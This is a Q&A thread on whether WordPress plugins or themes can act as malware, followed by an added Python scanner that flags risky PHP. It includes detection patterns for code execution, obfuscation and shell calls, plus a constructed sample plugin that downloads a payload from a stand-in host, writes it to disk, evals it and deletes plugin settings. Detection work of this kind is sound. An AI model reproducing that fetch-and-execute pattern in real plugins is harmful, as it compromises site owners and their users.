Can a WordPress plugin or theme contain a virus?

Is it possible to write a virus in the form of a WordPress plugin/theme?

Is it possible to:

  • steal user data?
  • damage existing WordPress installation?
  • (optionally) self-spread the virus?

Are there any existing cases of this kind of virus?


2 comments

  1. When you write PHP code, you can do just about anything. So when you run the code of a plugin, it can do just about anything as well.

    • It can query the database and get whatever info is there (which is why it’s a good idea to store passwords as hashes).
    • Since it can query the database, it can also delete anything in the database, ruining settings, turning off plugins, etc.
    • Plugins can send out info the normal way (mail, HTTP), so spreading a virus will be hard if the receiver has good protection.

    Depending on your server setup, a plugin can take over your server. If you allow it to download files that it can execute, it would be able to download any code that it would be able to run on your server. If the user running the code has enough privileges, it can do stuff like changing the password, effectively shutting you out of the server.

    But all of this will be easy to spot, so if a lot of people are using it, you should be safe to download and use it, since expert PHP developers would have found out about it.

    So the short answer is: yes, almost anything is possible, but the dangers are not that great if you use popular plugins.

    I think a bigger danger would be that the plugin is poorly written and will accidentally create a security risk, like not validating user-provided data, etc.

  2. Yes. Yes. Yes.

    All of these are not only possible, but also easily encountered in the wild. There have been whole waves of self-spreading WordPress malware for some older, insecure versions.

    Everything WordPress has access to – any theme or plugin has access to as well. Stealing or ruining data is trivial for code running as WP extensions.
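Both answers describe what hostile plugin code looks like in practice: direct database access, downloading and executing files, and code that hides what it does. As an added example (not from either commenter or the WordPress project), here is a small source scanner that flags those behaviours in plugin PHP. The pattern labels, the patterns themselves and the two sample plugins are constructed for illustration.

```python
import re
from typing import Dict, List

# Source-level patterns for the capabilities the answers describe: running arbitrary
# code, hiding it with encoding, shelling out, fetching remote content and writing
# it to disk, and destructive direct SQL. Labels and patterns are our own choice.
SUSPICIOUS = {
    "dynamic-code": re.compile(r"\b(eval|create_function|assert)\s*\("),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
    "shell-exec": re.compile(r"\b(system|exec|shell_exec|passthru|proc_open|popen)\s*\("),
    "remote-fetch": re.compile(r"\b(file_get_contents|fopen|wp_remote_get)\s*\(\s*['\"]https?://"),
    "write-file": re.compile(r"\b(file_put_contents|fwrite|move_uploaded_file)\s*\("),
    "destructive-sql": re.compile(r"\$wpdb->query\s*\(.*\b(DROP|DELETE|TRUNCATE|UPDATE)\b", re.I),
}

def scan_php(source: str) -> Dict[str, List[int]]:
    """Map each matched label to the 1-based line numbers where it occurs."""
    findings: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(line):
                findings.setdefault(label, []).append(lineno)
    return findings

def risk_score(findings: Dict[str, List[int]]) -> int:
    """One point per hit, plus a bonus for the 'download it, then store or run it' combination."""
    score = sum(len(lines) for lines in findings.values())
    if "remote-fetch" in findings and findings.keys() & {"write-file", "dynamic-code", "shell-exec"}:
        score += 5
    return score

# Constructed samples (not real plugins): one harmless, one doing what the thread warns about.
BENIGN = """<?php
/* Plugin Name: Hello Widget (constructed benign sample) */
add_action('init', function () {
    echo esc_html(get_option('hello_widget_text', 'hi'));
});
"""

MALICIOUS = """<?php
/* Plugin Name: Helpful SEO (constructed malicious sample) */
add_action('init', function () {
    global $wpdb;
    $payload = file_get_contents('http://example.invalid/p.txt');
    file_put_contents(__DIR__ . '/cache.php', $payload);
    eval(base64_decode($payload));
    $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name = 'active_plugins'");
});
"""
```

Hits are leads for manual review, not verdicts: legitimate plugins also write files and run SQL, so treat the score as a triage aid and read the flagged lines.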